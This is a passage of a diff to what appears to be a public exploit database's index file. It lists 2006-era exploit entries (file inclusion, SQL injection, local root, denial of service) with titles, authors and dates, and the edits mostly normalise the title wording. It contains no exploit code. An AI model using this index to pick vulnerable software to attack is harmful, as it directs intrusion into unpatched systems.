Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 +2463,platforms/osx/local/2463.c,"Mac OS X 10.4.7 - Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 +2464,platforms/osx/local/2464.pl,"Mac OS X 10.4.7 - Mach Exception Handling Local Exploit (10.3.x) (0Day)",2006-09-30,"Kevin Finisterre",osx,local,0 +2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion Exploit",2006-10-01,Kacper,php,webapps,0 +2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 -2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 - (includes/functions.php) Remote File Include",2006-10-02,SpiderZ,php,webapps,0 -2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 - (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 -2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include",2006-10-03,mozi,php,webapps,0 -2471,platforms/php/webapps/2471.pl,"Travelsized CMS <= 0.4 - (frontpage.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 -2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS <= 5.0.1 - (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 -2473,platforms/php/webapps/2473.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit",2006-10-03,1nf3ct0r,php,webapps,0 -2474,platforms/php/webapps/2474.txt,"JAF CMS <= 4.0 RC1 - Multiple Remote File Include Vulnerabilities",2006-10-04,"ThE TiGeR",php,webapps,0 -2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod <= 0.94b - File Include",2006-10-04,SpiderZ,php,webapps,0 -2476,platforms/php/webapps/2476.txt,"phpGreetz <= 0.99 - (footer.php) Remote File Include",2006-10-04,mozi,php,webapps,0 -2477,platforms/php/webapps/2477.txt,"phpBB Static Topics <= 1.0 - phpbb_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 -2478,platforms/php/webapps/2478.txt,"phpMyTeam <= 2.0 - (smileys_dir) Remote File Include",2006-10-05,"Mehmet Ince",php,webapps,0 -2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - (index.php) Remote SQL Injection",2006-10-05,Kzar,php,webapps,0 -2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Include",2006-10-05,SpiderZ,php,webapps,0 -2481,platforms/php/webapps/2481.txt,"Dimension of phpBB <= 0.2.6 - (phpbb_root_path) Remote File Includes",2006-10-05,SpiderZ,php,webapps,0 +2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - (includes/functions.php) Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 +2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - (forum.php) Remote File Inclusion Exploit",2006-10-03,Kacper,php,webapps,0 +2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0 +2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - (frontpage.php) Remote File Inclusion Exploit",2006-10-03,Kacper,php,webapps,0 +2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 +2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit",2006-10-03,1nf3ct0r,php,webapps,0 +2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion Vulnerabilities",2006-10-04,"ThE TiGeR",php,webapps,0 +2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Include",2006-10-04,SpiderZ,php,webapps,0 +2476,platforms/php/webapps/2476.txt,"phpGreetz 0.99 - (footer.php) Remote File Inclusion",2006-10-04,mozi,php,webapps,0 +2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 +2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0 +2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - (index.php) SQL Injection",2006-10-05,Kzar,php,webapps,0 +2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 +2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - (phpbb_root_path) Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow Exploit",2006-10-05,SkOd,windows,remote,0 -2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker <= 1.0 File Include",2006-10-06,"Mehmet Ince",php,webapps,0 -2484,platforms/php/webapps/2484.txt,"FreeForum <= 0.9.7 - (forum.php) Remote File Include",2006-10-07,"Mehmet Ince",php,webapps,0 -2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - (lire.php) Remote SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 +2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 File Include",2006-10-06,"Mehmet Ince",php,webapps,0 +2484,platforms/php/webapps/2484.txt,"FreeForum 0.9.7 - (forum.php) Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps,0 +2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - (lire.php) SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod Inclusion",2006-10-07,bd0rk,php,webapps,0 -2487,platforms/php/webapps/2487.php,"4Images 1.7.x - (search.php) Remote SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 -2488,platforms/php/webapps/2488.txt,"PHPMyNews <= 1.4 - (cfg_include_dir) Remote File Include Vulnerabilities",2006-10-08,"Mehmet Ince",php,webapps,0 -2489,platforms/php/webapps/2489.pl,"Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit",2006-10-08,Kacper,php,webapps,0 -2490,platforms/php/webapps/2490.txt,"Freenews <= 1.1 - (moteur.php) Remote File Include",2006-10-08,"Mehmet Ince",php,webapps,0 -2491,platforms/php/webapps/2491.pl,"phpPC <= 1.03 RC1 - (/lib/functions.inc.php) Remote File Include Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +2487,platforms/php/webapps/2487.php,"4Images 1.7.x - (search.php) SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 +2488,platforms/php/webapps/2488.txt,"PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion Vulnerabilities",2006-10-08,"Mehmet Ince",php,webapps,0 +2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b (config.php) Remote File Inclusion Exploit",2006-10-08,Kacper,php,webapps,0 +2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - (moteur.php) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 +2491,platforms/php/webapps/2491.pl,"phpPC 1.03 RC1 - (/lib/functions.inc.php) Remote File Inclusion Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 2492,platforms/linux/local/2492.s,"Infecting Elf Binaries to Gain Local Root Exploit",2006-10-08,Sha0,linux,local,0 -2493,platforms/php/webapps/2493.pl,"docmint <= 2.0 - (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 -2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2496,platforms/php/webapps/2496.txt,"WebYep <= 1.1.9 - (webyep_sIncludePath) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2498,platforms/php/webapps/2498.php,"Flatnuke <= 2.5.8 - file() Privilege Escalation / Code Execution Exploit",2006-10-10,rgod,php,webapps,0 +2493,platforms/php/webapps/2493.pl,"docmint 2.0 - (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 +2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - (webyep_sIncludePath) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution Exploit",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 -2500,platforms/php/webapps/2500.pl,"phpMyAgenda <= 3.1 - (templates/header.php3) Local File Include Exploit",2006-10-10,"Nima Salehi",php,webapps,0 -2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta (ftag.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2502,platforms/php/webapps/2502.txt,"registroTL (main.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2503,platforms/php/webapps/2503.txt,"compteur 2.0 - (param_editor.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2504,platforms/php/webapps/2504.txt,"eboli (index.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2505,platforms/php/webapps/2505.txt,"JASmine <= 0.0.2 - (index.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2506,platforms/php/webapps/2506.txt,"Foafgen <= 0.3 - (redir.php) Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 -2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom <= 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 -2508,platforms/php/webapps/2508.txt,"vtiger CRM <= 4.2 - (calpath) Multiple Remote File Include Vulnerabilities",2006-10-10,the_day,php,webapps,0 -2509,platforms/php/webapps/2509.txt,"Exhibit Engine <= 1.5 RC 4 - (photo_comment.php) File Include Exploit",2006-10-10,Kacper,php,webapps,0 -2510,platforms/php/webapps/2510.txt,"Claroline <= 1.8.0 rc1 - (import.lib.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2511,platforms/php/webapps/2511.txt,"PHPLibrary <= 1.5.3 - (grid3.lib.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2512,platforms/php/webapps/2512.txt,"Jinzora <= 2.1 - (media.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2513,platforms/php/webapps/2513.txt,"ae2 - (standart.inc.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2514,platforms/php/webapps/2514.txt,"n@board <= 3.1.9e (naboard_pnr.php) Remote File Include",2006-10-11,mdx,php,webapps,0 -2515,platforms/multiple/dos/2515.txt,"Kmail <= 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 +2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - (templates/header.php3) Local File Inclusion Exploit",2006-10-10,"Nima Salehi",php,webapps,0 +2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta (ftag.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2502,platforms/php/webapps/2502.txt,"registroTL (main.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2503,platforms/php/webapps/2503.txt,"compteur 2.0 - (param_editor.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2504,platforms/php/webapps/2504.txt,"eboli (index.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2505,platforms/php/webapps/2505.txt,"JASmine 0.0.2 - (index.php) Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 +2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - (redir.php) Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 +2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 +2508,platforms/php/webapps/2508.txt,"vtiger CRM 4.2 - (calpath) Multiple Remote File Inclusion Vulnerabilities",2006-10-10,the_day,php,webapps,0 +2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - (photo_comment.php) File Include Exploit",2006-10-10,Kacper,php,webapps,0 +2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - (import.lib.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - (grid3.lib.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2512,platforms/php/webapps/2512.txt,"Jinzora 2.1 - (media.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2513,platforms/php/webapps/2513.txt,"ae2 - (standart.inc.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e (naboard_pnr.php) Remote File Inclusion",2006-10-11,mdx,php,webapps,0 +2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Include",2006-10-11,"Nima Salehi",php,webapps,0 -2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 - (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0 -2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 - (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0 -2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include",2006-10-11,Zickox,php,webapps,0 -2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0 -2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 - (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0 -2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpbb.inc.php) Remote File Inclusion Exploit",2006-10-11,"Nima Salehi",php,webapps,0 +2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - (scriptpath) Multiple Remote File Inclusion Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0 +2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 +2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0 +2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - (spaw) Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 +2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 -2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 -2526,platforms/php/webapps/2526.txt,"phpht Topsites (common.php) Remote File Include",2006-10-12,"Mehmet Ince",php,webapps,0 -2527,platforms/php/webapps/2527.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)",2006-10-12,ShadOS,php,webapps,0 -2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer <= 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 -2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 - (Htmls) Remote File Include Vulnerabilities",2006-10-12,mdx,php,webapps,0 +2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2526,platforms/php/webapps/2526.txt,"phpht Topsites (common.php) Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 +2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (linux)",2006-10-12,ShadOS,php,webapps,0 +2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 +2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 - (Htmls) Remote File Inclusion Vulnerabilities",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow Exploit (PoC)",2006-10-12,h07,windows,remote,0 -2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod <= 0.1.4 - Remote File Include",2006-10-12,boecke,php,webapps,0 -2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox <= 0.0.5 - Remote File Include",2006-10-12,boecke,php,webapps,0 -2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 -2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Include Exploit",2006-10-12,r0ut3r,php,webapps,0 -2535,platforms/php/webapps/2535.txt,"phpMyConferences <= 8.0.2 - (menu.inc.php) File Include",2006-10-13,k1tk4t,php,webapps,0 -2536,platforms/php/webapps/2536.txt,"Open Conference Systems <= 1.1.4 - (fullpath) File Include Vulnerabilities",2006-10-13,k1tk4t,php,webapps,0 -2537,platforms/php/webapps/2537.pl,"maluinfo <= 206.2.38 - (bb_usage_stats.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2538,platforms/php/webapps/2538.pl,"phpBB PlusXL <= 2.0_272 - (constants.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2539,platforms/php/webapps/2539.txt,"Genepi <= 1.6 - (genepi.php) Remote File Include",2006-10-13,Kw3[R]Ln,php,webapps,0 -2540,platforms/php/webapps/2540.txt,"Cdsagenda <= 4.2.9 - (SendAlertEmail.php) File Include",2006-10-13,Drago84,php,webapps,0 -2541,platforms/bsd/dos/2541.c,"FreeBSD <= 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 -2542,platforms/bsd/dos/2542.c,"FreeBSD <= 6.1-RELEASE-p10 - (scheduler) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 +2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 +2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 +2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion Exploit",2006-10-12,r0ut3r,php,webapps,0 +2535,platforms/php/webapps/2535.txt,"phpMyConferences 8.0.2 - (menu.inc.php) File Include",2006-10-13,k1tk4t,php,webapps,0 +2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Include Vulnerabilities",2006-10-13,k1tk4t,php,webapps,0 +2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - (bb_usage_stats.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - (genepi.php) Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 +2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - (SendAlertEmail.php) File Include",2006-10-13,Drago84,php,webapps,0 +2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 +2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Local Root Exploit",2006-10-13,"Marco Ivaldi",solaris,local,0 -2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod (zufallscodepart.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale <= 4.1.1 - Remote Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod <= 1.0b Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 functions_rpg_events Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod (archive_topic.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod <= 0.8.0 - Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod (zufallscodepart.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 functions_rpg_events Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod (archive_topic.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 File Inclusion",2006-10-13,bd0rk,php,webapps,0 -2552,platforms/php/webapps/2552.pl,"phpBB Security <= 1.0.1 - (php_security.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Include",2006-10-13,SilenZ,php,webapps,0 -2554,platforms/php/webapps/2554.php,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 -2555,platforms/php/webapps/2555.txt,"CentiPaid <= 1.4.2 centipaid_class.php Remote File Include",2006-10-14,Kw3[R]Ln,php,webapps,0 -2556,platforms/php/webapps/2556.txt,"E-Uploader Pro <= 1.0 Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 -2557,platforms/php/webapps/2557.txt,"IncCMS Core <= 1.0.0 - (settings.php) Remote File Include",2006-10-14,Kacper,php,webapps,0 -2558,platforms/php/webapps/2558.txt,"Jinzora <= 2.6 - (extras/mt.php) Remote File Include",2006-10-14,ddoshomo,php,webapps,0 -2559,platforms/php/webapps/2559.txt,"CyberBrau <= 0.9.4 - (forum/track.php) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2560,platforms/php/webapps/2560.txt,"CampSite <= 2.6.1 - (g_documentRoot) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail <= 0.98b (process.php) Remote Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2562,platforms/php/webapps/2562.txt,"AROUNDMe <= 0.5.2 - (templatePath) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2563,platforms/php/webapps/2563.pl,"phpBurningPortal <= 1.0.1 - (lang_path) Remote File Include Exploit",2006-10-15,r0ut3r,php,webapps,0 -2564,platforms/php/webapps/2564.pl,"phpBBFM <= 206-3-3 - (phpbb_root_path) Remote File Include Exploit",2006-10-15,Kamalian,php,webapps,0 -2565,platforms/osx/local/2565.pl,"Xcode OpenBase <= 9.1.5 - Local Root Exploit (OSX)",2006-10-15,"Kevin Finisterre",osx,local,0 -2566,platforms/php/webapps/2566.txt,"DigitalHive <= 2.0 RC2 - (base_include.php) Remote Include",2006-10-15,SHiKaA,php,webapps,0 -2567,platforms/php/webapps/2567.txt,"Def-Blog <= 1.0.3 - (comadd.php) Remote SQL Injection",2006-10-15,SHiKaA,php,webapps,0 -2568,platforms/php/webapps/2568.txt,"webSPELL <= 4.01.01 - (getsquad) Remote SQL Injection Exploit",2006-10-15,Kiba,php,webapps,0 +2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - (php_security.php) Remote File Inclusion Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 +2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 +2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 +2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 +2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - (settings.php) Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 +2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - (extras/mt.php) Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 +2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - (forum/track.php) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2560,platforms/php/webapps/2560.txt,"CampSite 2.6.1 - (g_documentRoot) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail 0.98b (process.php) Remote Include",2006-10-15,Kw3[R]Ln,php,webapps,0 +2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion Exploit",2006-10-15,r0ut3r,php,webapps,0 +2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - (phpbb_root_path) Remote File Inclusion Exploit",2006-10-15,Kamalian,php,webapps,0 +2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 - Local Root Exploit (OSX)",2006-10-15,"Kevin Finisterre",osx,local,0 +2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - (base_include.php) Remote Include",2006-10-15,SHiKaA,php,webapps,0 +2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - (comadd.php) SQL Injection",2006-10-15,SHiKaA,php,webapps,0 +2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection Exploit",2006-10-15,Kiba,php,webapps,0 2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit",2006-10-16,"Marco Ivaldi",solaris,local,0 -2570,platforms/php/webapps/2570.txt,"OpenDock FullCore <= 